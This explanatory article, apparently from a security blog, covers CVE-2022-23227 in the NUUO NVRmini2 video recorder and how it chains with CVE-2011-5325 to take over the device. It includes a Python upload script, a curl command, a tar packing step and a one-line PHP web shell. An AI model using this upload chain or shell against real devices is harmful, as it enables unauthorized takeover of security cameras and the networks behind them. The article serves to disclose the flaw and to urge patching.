CVE-2022-23227 is a critical vulnerability in the NUUO NVRmini2 network video recorder. This flaw allows an attacker, without logging in, to upload specially-crafted files and gain unauthorized access or execute code as root. The issue lies in the device's handle_import_user.php script, which does not authenticate requests, and, when paired with another old vulnerability (CVE-2011-5325), can be used for full system compromise. In this article, we’ll break down what’s going on, how it works, show code snippets, and explain how attackers can exploit these bugs.
Background
NUUO NVRmini2 is a network video recorder used in many security camera setups for businesses and occasionally by consumers. Keeping such devices secure is essential because they are often found on sensitive networks, sometimes exposed to the public internet.
Reference:
CVE-2022-23227 at NIST NVD
Vendor Advisory
The Initial Bug: handle_import_user.php Lacks Authentication
handle_import_user.php lets admins upload user data as a tar archive—handy for big organizations. Unfortunately, it doesn’t check who is making the upload. This lets anyone upload a fake (but properly formatted) tar file to the device:
It expects an encrypted tar containing user configuration.
- No verification is done before importing the users, so arbitrary user accounts can be created surreptitiously.
Code Workflow (Simplified)
// handle_import_user.php (simplified pseudo code)
if ($_FILES['file']['tmp_name']) {
// No auth check!
$archive = file_get_contents($_FILES['file']['tmp_name']);
// Decrypt + untar
extract_tar_and_apply_users($archive); // This adds users from the archive!
echo "success";
}
Attack Scenario: Adding Unauthorized Users
An attacker can craft and encrypt a tar archive that includes a legitimate-looking user (e.g., admin or other privileged account) and POST it to the handle_import_user.php endpoint. This results in an arbitrary user being added, often with admin privileges.
Below is a simple example of uploading a user file to the target endpoint
import requests
url = 'http://target-ip/cgi-bin/handle_import_user.php';
files = {
'file': ('malicious_user.tar', open('malicious_user.tar', 'rb'), 'application/x-tar')
}
response = requests.post(url, files=files)
print(response.text) # Should display 'success'
*Note: For a real attack, you must properly encrypt the tarball as the device expects.*
Chaining with CVE-2011-5325: Arbitrary File Overwrite
CVE-2011-5325 is an older flaw that lets an attacker overwrite arbitrary files under the web root during tar extraction. When combined with the first bug, an attacker can upload a tar archive containing a malicious PHP file (like a web shell), overwriting an existing file or placing a new one in the web root.
Example Malicious PHP File
<?php system($_GET['cmd']); ?>
Example Tar Command to Create Archive
tar -cf malicious.tar -C /path/to/your/shell . # Add your PHP file
# Encryption would need to match the device's expected format
Same as above, using Curl
curl -F "file=@malicious.tar" http://target-ip/cgi-bin/handle_import_user.php
Arbitrary User Creation: Complete admin access without authentication.
- Remote Code Execution: Via file overwrite, resulting in total device compromise, including access to camera feeds and potentially the broader network.
If you use NUUO NVRmini2
- Update to the latest firmware immediately (latest available here).
References & Further Reading
- NIST NVD Entry for CVE-2022-23227
- CVE-2011-5325
- Vendor Security Advisory
- Exploit Details at SSD-Disclosure
Conclusion
CVE-2022-23227, especially when combined with CVE-2011-5325, is a critical vulnerability that lets just about anyone take over a NUUO NVRmini2 device remotely. The exploit is disturbingly simple and could be automated. Any affected device should be patched or isolated right away. Always make sure your IoT equipment—even a “simple” security recorder—is locked down and up to date.
Timeline
Published on: 01/14/2022 18:15:00 UTC
Last modified on: 01/21/2022 18:51:00 UTC